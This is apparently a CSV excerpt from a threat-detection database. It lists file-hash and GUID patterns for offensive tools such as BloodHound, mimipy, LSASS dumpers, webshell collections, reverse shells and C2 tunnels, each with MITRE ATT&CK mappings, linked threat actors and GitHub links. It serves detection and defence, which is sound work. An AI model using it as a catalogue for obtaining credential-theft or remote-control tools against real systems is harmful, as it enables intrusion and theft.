"*46793c55c24e616a0d4eaaa0090b70bdde05e50c1b58da753d09063e6e838cc6*",".{0,1000}46793c55c24e616a0d4eaaa0090b70bdde05e50c1b58da753d09063e6e838cc6.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","25788"
"*467bdf16e6c642b993a999efdfe9beaa4d4eb7eb9d94670703dd75bfc6f48f65*",".{0,1000}467bdf16e6c642b993a999efdfe9beaa4d4eb7eb9d94670703dd75bfc6f48f65.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25789"
"*4681186a8bcaff98f0d2513d30add67345491b95f7f743883e6ca2506ba7aaaf*",".{0,1000}4681186a8bcaff98f0d2513d30add67345491b95f7f743883e6ca2506ba7aaaf.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","25791"
"*4695acbd22ff9cce0fa585459cbaaf879ffdd59f0f6f583074902c34773e6293*",".{0,1000}4695acbd22ff9cce0fa585459cbaaf879ffdd59f0f6f583074902c34773e6293.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25798"
"*469796062be14876fd4a7f37c4cab22bac6ccee6a9c3e90c696b5901fe22f13a*",".{0,1000}469796062be14876fd4a7f37c4cab22bac6ccee6a9c3e90c696b5901fe22f13a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25799"
"*46993522-7D77-4B59-9B77-F82082DE9D81*",".{0,1000}\s\'46993522\-7D77\-4B59\-9B77\-F82082DE9D81\'\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","#GUIDproject","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","25800"
"*469e77c37fbde99cddbaeedd98701e6344665931f382dce3ba36e9e4ea4c3a00*",".{0,1000}469e77c37fbde99cddbaeedd98701e6344665931f382dce3ba36e9e4ea4c3a00.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25802"
"*46ae3c70f1c7fb28a292eb50e6845b5ebdcdd811b02ec53e8c3007c12d326a8f*",".{0,1000}46ae3c70f1c7fb28a292eb50e6845b5ebdcdd811b02ec53e8c3007c12d326a8f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25804"
"*46aee0547844dab640a8f982d4fb71207da42c0e00e214f2012680d3822adb85*",".{0,1000}46aee0547844dab640a8f982d4fb71207da42c0e00e214f2012680d3822adb85.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","25805"
"*46af05c6fd5f190ff57c562622d7345f016059e6d8399d3401ded79d61d54089*",".{0,1000}46af05c6fd5f190ff57c562622d7345f016059e6d8399d3401ded79d61d54089.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25806"
"*46af7c0674c69df2af1905ea58288f24d2d10e644d5446d8d2b71b251e8e70bd*",".{0,1000}46af7c0674c69df2af1905ea58288f24d2d10e644d5446d8d2b71b251e8e70bd.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","25807"
"*46ba3075010ce026f20aad133b871d4fec53b6d2972f736ee1a98a8d1bfb7ff9*",".{0,1000}46ba3075010ce026f20aad133b871d4fec53b6d2972f736ee1a98a8d1bfb7ff9.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","25809"
"*46ba6286810d79be37facbd8c315a35acc1d49dc012870a50014eaff1bcd1fbd*",".{0,1000}46ba6286810d79be37facbd8c315a35acc1d49dc012870a50014eaff1bcd1fbd.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","25810"
"*46c816bb93ab1d318a84b7295969a7b9d2b8a728f5a6af52126119cc74d26d0a*",".{0,1000}46c816bb93ab1d318a84b7295969a7b9d2b8a728f5a6af52126119cc74d26d0a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25812"
"*46c81a0250992cc04c2ee1ce3253fd4629e6ae25da1cecdbfe0427b5aa3157c4*",".{0,1000}46c81a0250992cc04c2ee1ce3253fd4629e6ae25da1cecdbfe0427b5aa3157c4.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#filehash","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","25813"
"*46d1f15077f064a99b06bb115ba498581828ff8b712b2c41f6eb602538077035*",".{0,1000}46d1f15077f064a99b06bb115ba498581828ff8b712b2c41f6eb602538077035.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","#filehash","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","25815"
"*46D3E566-0EBA-4BD9-925E-84F4CB9EE7BC*",".{0,1000}46D3E566\-0EBA\-4BD9\-925E\-84F4CB9EE7BC.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#GUIDproject","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","25817"
"*46db2ff1d405f57e52377c5e42b9918d7b00c47ea75a5a77352dacd1d8d0c97a*",".{0,1000}46db2ff1d405f57e52377c5e42b9918d7b00c47ea75a5a77352dacd1d8d0c97a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25821"
"*46e7e0cd3eae7fa11350683e8d75c44e575d590aba9574eba619ccec699b3d30*",".{0,1000}46e7e0cd3eae7fa11350683e8d75c44e575d590aba9574eba619ccec699b3d30.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25823"
"*46EB7B83-3404-4DFC-94CC-704B02D11464*",".{0,1000}46EB7B83\-3404\-4DFC\-94CC\-704B02D11464.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","#GUIDproject","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","25824"
"*46f1f34d38963f9ee2e81449356b0f39475ea1f31395edfa097e08ce975b4748*",".{0,1000}46f1f34d38963f9ee2e81449356b0f39475ea1f31395edfa097e08ce975b4748.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25825"
"*46f31a5656b5592c4b37514bf7726bb1d51140b7eab918643a931cd269289b19*",".{0,1000}46f31a5656b5592c4b37514bf7726bb1d51140b7eab918643a931cd269289b19.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","25826"
"*46f917a6a3de5d2b29fd77a842015ac27e6e3ba2faa92395c27666b2721dcaa0*",".{0,1000}46f917a6a3de5d2b29fd77a842015ac27e6e3ba2faa92395c27666b2721dcaa0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","25827"
"*46fd93a2992e8e9a29740d3d116d6d802315e51753f667cd3e462845ddea663c*",".{0,1000}46fd93a2992e8e9a29740d3d116d6d802315e51753f667cd3e462845ddea663c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25828"
"*470150f91aebe1fd59949728f99b2bb847cf8d1867ca2ee767fef9b7c44e206d*",".{0,1000}470150f91aebe1fd59949728f99b2bb847cf8d1867ca2ee767fef9b7c44e206d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","25829"
"*47042a24b908274eec6f075245339e4f6058834220e3c2469e235c881d8aa5eb*",".{0,1000}47042a24b908274eec6f075245339e4f6058834220e3c2469e235c881d8aa5eb.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","0","#filehash","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","25830"
"*4709b94c38800c9a400aeee54241b107b8fd597f34e3283949a18537f2ae04a7*",".{0,1000}4709b94c38800c9a400aeee54241b107b8fd597f34e3283949a18537f2ae04a7.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","0","#filehash","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","25832"
"*47164ef76a78406a70ee1b88ae4e31230ace7ee2ba6c3a56b0b9771b75e14fff*",".{0,1000}47164ef76a78406a70ee1b88ae4e31230ace7ee2ba6c3a56b0b9771b75e14fff.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25833"
"*471f844b5ea9583d0f2f4ad2adf9dfd91b407d54f8e984bd901c19a39d1dd1d7*",".{0,1000}471f844b5ea9583d0f2f4ad2adf9dfd91b407d54f8e984bd901c19a39d1dd1d7.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25834"
"*471ff2b50c255470e1ed51c9e712abfb95d36803c1c1e186f9048e5118a1a62b*",".{0,1000}471ff2b50c255470e1ed51c9e712abfb95d36803c1c1e186f9048e5118a1a62b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25835"
"*47266@AIRMAIL.CC*",".{0,1000}47266\@AIRMAIL\.CC.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25837"
"*472ff356009e3d68bdf619c87f27fd79f791f0245c78b553e6726e59817511c5*",".{0,1000}472ff356009e3d68bdf619c87f27fd79f791f0245c78b553e6726e59817511c5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25838"
"*4747b86b7a8d2ba61f377e2526d6f2764cb8146be5dd8d6ad42af745dd705c8b*",".{0,1000}4747b86b7a8d2ba61f377e2526d6f2764cb8146be5dd8d6ad42af745dd705c8b.{0,1000}","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1110.001 - T1555.003 - T1003.002","TA0006","N/A","menuPass - APT41 - Threat Group-3390 - APT1 - Turla - APT39 - FIN5","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25840"
"*474B99B7-66C4-4AC2-8AD3-065DD13DDDFF*",".{0,1000}474B99B7\-66C4\-4AC2\-8AD3\-065DD13DDDFF.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","#GUIDproject","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","25842"
"*4755e1f4336849953c87bbc5f4d63698eb44d6a3b2533e591ee7cd07a16a9937*",".{0,1000}4755e1f4336849953c87bbc5f4d63698eb44d6a3b2533e591ee7cd07a16a9937.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25844"
"*475aaa5c274e43b4717906180e531d3562bc154b2de723a6b37d30c87e647467*",".{0,1000}475aaa5c274e43b4717906180e531d3562bc154b2de723a6b37d30c87e647467.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25845"
"*475e1063cd3404621f051db1a5f3c9aaf939433f5996bf97388c90f3bc5f9fd2*",".{0,1000}475e1063cd3404621f051db1a5f3c9aaf939433f5996bf97388c90f3bc5f9fd2.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25846"
"*4762afbed760fd74821549b9f03467e32cb4ce26e0a244da011ef447aa0b9234*",".{0,1000}4762afbed760fd74821549b9f03467e32cb4ce26e0a244da011ef447aa0b9234.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25848"
"*4768435dcfd9ec06377e5b83489898683c97b1a44ec11ef452c640c82b48bfe1*",".{0,1000}4768435dcfd9ec06377e5b83489898683c97b1a44ec11ef452c640c82b48bfe1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25849"
"*476FC126-239F-4D58-8389-E1C0E93C2C5E*",".{0,1000}476FC126\-239F\-4D58\-8389\-E1C0E93C2C5E.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","#GUIDproject","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","25850"
"*4773112ed8b41ef5fc0ad7b59134be3e5204b726154d1e97553e16f85fa2a045*",".{0,1000}4773112ed8b41ef5fc0ad7b59134be3e5204b726154d1e97553e16f85fa2a045.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25851"
"*47747e172be46f80fb7817cb3f0069f5354883d733f98f63ba3dc1849d1c69a2*",".{0,1000}47747e172be46f80fb7817cb3f0069f5354883d733f98f63ba3dc1849d1c69a2.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25854"
"*4775208998622726a1b1a5f156e6e88b2ba4e568416795c19358d7380c35b0b8*",".{0,1000}4775208998622726a1b1a5f156e6e88b2ba4e568416795c19358d7380c35b0b8.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","0","#filehash","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","25855"
"*47754449ae1a74f008d1a322a1b66110af723cf08bc9b866723f58473d02e444*",".{0,1000}47754449ae1a74f008d1a322a1b66110af723cf08bc9b866723f58473d02e444.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25856"
"*4777595decaa624e3a5c966272392cb58a20add5e7ab25d7a3d89e923a6905a1*",".{0,1000}4777595decaa624e3a5c966272392cb58a20add5e7ab25d7a3d89e923a6905a1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25857"
"*4781b10d0dae27a772518c9167b3a654c46017897bc73ce4540f4bfca33e9b58*",".{0,1000}4781b10d0dae27a772518c9167b3a654c46017897bc73ce4540f4bfca33e9b58.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","#filehash","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","25858"
"*47849ce5bce4642bcd3811063e45984219ce4b6b006847acfdc88b1186313420*",".{0,1000}47849ce5bce4642bcd3811063e45984219ce4b6b006847acfdc88b1186313420.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25860"
"*478b63e32ecfb5302ba2e6da13a8c16055ad0885c3f65b90f52e6c23240a35a1*",".{0,1000}478b63e32ecfb5302ba2e6da13a8c16055ad0885c3f65b90f52e6c23240a35a1.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","25861"
